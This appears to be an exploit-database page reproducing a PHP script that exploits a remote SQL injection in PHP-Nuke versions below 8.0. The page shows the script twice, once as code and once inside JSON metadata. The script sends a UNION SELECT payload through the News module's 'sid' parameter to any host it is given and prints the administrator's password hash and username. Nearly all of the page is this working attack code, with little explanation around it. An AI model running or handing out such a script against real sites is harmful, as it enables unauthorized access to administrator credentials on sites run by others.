Search...

PHP-Nuke < 8.0 sid Remote SQL Injection Exploit

2008-01-22T00:00:00

ID EDB-ID:4964
Type exploitdb
Reporter RST/GHC
Modified 2008-01-22T00:00:00

Description

PHP-Nuke < 8.0 (sid) Remote SQL Injection Exploit. Webapps exploit for php platform

                                        
                                            &lt;?php
error_reporting (E_ERROR);
ini_set("max_execution_time",0);

echo '
+=========================================+
| RST/GHC unpublished PHP Nuke exploit &lt;8 |
+=========================================+
&lt;+&gt; version &lt;8.0
&lt;+&gt; Tested on 7.9 & 6.0
';

if ($argc &lt; 2){
print "Usage: " . $argv[0] . " &lt;host&gt; &lt;version&gt; [table prefix]\n";
print "ex.: " . $argv[0] . " phpnuke.org 7\n";
credits();
exit;
}


/* few definitions */
if (empty($argv[3])){ $prefix = 'nuke';} #define tables prefix
else {$prefix = $argv[3];}

switch ($argv[2]){
case "6":
$query ="modules.php?name=News&file=article&sid=99999999+UNION+SELECT+null%20as%20catid,pwd%20as%20aid,null%20as%20time,pwd%20as%20title,null%20as%20hometext,aid%20as%20bodytext,null%20as%20topic,null%20as%20informant,null%20as%20notes,null%20as%20acomm,%20null%20as%20haspoll,null%20as%20pollID,null%20as%20score,null%20as%20ratings%20FROM%20%60".$prefix."_authors%60%20WHERE%20%60radminsuper%60%20='1'";
$version = 6;
break;
default:
$query ="modules.php?name=News&file=article&sid=99999999'+UNION+SELECT+null%20as%20catid,pwd%20as%20aid,null%20as%20time,pwd%20as%20title,null%20as%20hometext,aid%20as%20bodytext,null%20as%20topic,null%20as%20informant,null%20as%20notes,null%20as%20acomm,%20null%20as%20haspoll,null%20as%20pollID,null%20as%20score,null%20as%20ratings%20FROM%20%60".$prefix."_authors%60%20WHERE%20%60radminsuper%60%20='1";
$version = 7;
break;
}

$host = 'http://' . $argv[1] . '/'; # argv[1] - host
$http = $host . $query;
echo
'[+] host: '.$host . '
[+] nuke version: '.$version.'
';
#DEBUG
//print $http . "\n";

$result = file_get_contents($http);

preg_match("/([a-f0-9]{32})/", $result, $matches);
if ($matches[0]) {print "Admin's Hash: ".$matches[0];
if (preg_match("/(?&lt;=\&lt;br\&gt;\&lt;br\&gt;)(.*)(?=\"\&lt;\/i\&gt;)/", $result, $match)) print "\nAdmin's name: " .$match[0];}
else {echo "Exploit failed...";}

credits();


function credits(){
print "\n\n+========================================+\n\r Coded by Foster \n\r Copyright (c) RST/GHC";
print "\n\r+========================================+\n";
exit;
}

?&gt;

# milw0rm.com [2008-01-22]

JSON Vulners Source

Initial Source

{"hash": "385ae9e020d8f50c5c6ee6bb4904e575f35b1206efccd052e63591f78dc2e055", "id": "EDB-ID:4964", "lastseen": "2016-01-31T21:12:47", "enchantments": {"vulnersScore": 7.5}, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/4964/", "description": "PHP-Nuke < 8.0 (sid) Remote SQL Injection Exploit. Webapps exploit for php platform", "title": "PHP-Nuke < 8.0 sid Remote SQL Injection Exploit", "sourceData": "<?php\nerror_reporting (E_ERROR);\nini_set(\"max_execution_time\",0);\n\necho '\n+=========================================+\n| RST/GHC unpublished PHP Nuke exploit <8 |\n+=========================================+\n<+> version <8.0\n<+> Tested on 7.9 & 6.0\n';\n\nif ($argc < 2){\nprint \"Usage: \" . $argv[0] . \" <host> <version> [table prefix]\\n\";\nprint \"ex.: \" . $argv[0] . \" phpnuke.org 7\\n\";\ncredits();\nexit;\n}\n\n\n/* few definitions */\nif (empty($argv[3])){ $prefix = 'nuke';} #define tables prefix\nelse {$prefix = $argv[3];}\n\nswitch ($argv[2]){\ncase \"6\":\n$query =\"modules.php?name=News&file=article&sid=99999999+UNION+SELECT+null%20as%20catid,pwd%20as%20aid,null%20as%20time,pwd%20as%20title,null%20as%20hometext,aid%20as%20bodytext,null%20as%20topic,null%20as%20informant,null%20as%20notes,null%20as%20acomm,%20null%20as%20haspoll,null%20as%20pollID,null%20as%20score,null%20as%20ratings%20FROM%20%60\".$prefix.\"_authors%60%20WHERE%20%60radminsuper%60%20='1'\";\n$version = 6;\nbreak;\ndefault:\n$query =\"modules.php?name=News&file=article&sid=99999999'+UNION+SELECT+null%20as%20catid,pwd%20as%20aid,null%20as%20time,pwd%20as%20title,null%20as%20hometext,aid%20as%20bodytext,null%20as%20topic,null%20as%20informant,null%20as%20notes,null%20as%20acomm,%20null%20as%20haspoll,null%20as%20pollID,null%20as%20score,null%20as%20ratings%20FROM%20%60\".$prefix.\"_authors%60%20WHERE%20%60radminsuper%60%20='1\";\n$version = 7;\nbreak;\n}\n\n$host = 'http://' . $argv[1] . '/'; # argv[1] - host\n$http = $host . $query;\necho\n'[+] host: '.$host . '\n[+] nuke version: '.$version.'\n';\n#DEBUG\n//print $http . \"\\n\";\n\n$result = file_get_contents($http);\n\npreg_match(\"/([a-f0-9]{32})/\", $result, $matches);\nif ($matches[0]) {print \"Admin's Hash: \".$matches[0];\nif (preg_match(\"/(?<=\\<br\\>\\<br\\>)(.*)(?=\\\"\\<\\/i\\>)/\", $result, $match)) print \"\\nAdmin's name: \" .$match[0];}\nelse {echo \"Exploit failed...\";}\n\ncredits();\n\n\nfunction credits(){\nprint \"\\n\\n+========================================+\\n\\r Coded by Foster \\n\\r Copyright (c) RST/GHC\";\nprint \"\\n\\r+========================================+\\n\";\nexit;\n}\n\n?>\n\n# milw0rm.com [2008-01-22]\n", "objectVersion": "1.0", "cvelist": [], "published": "2008-01-22T00:00:00", "osvdbidlist": [], "references": [], "reporter": "RST/GHC", "modified": "2008-01-22T00:00:00", "href": "https://www.exploit-db.com/exploits/4964/"}

PHP-Nuke &lt; 8.0 sid Remote SQL Injection Exploit

Description

PHP-Nuke < 8.0 (sid) Remote SQL Injection Exploit. Webapps exploit for php platform

PHP-Nuke < 8.0 sid Remote SQL Injection Exploit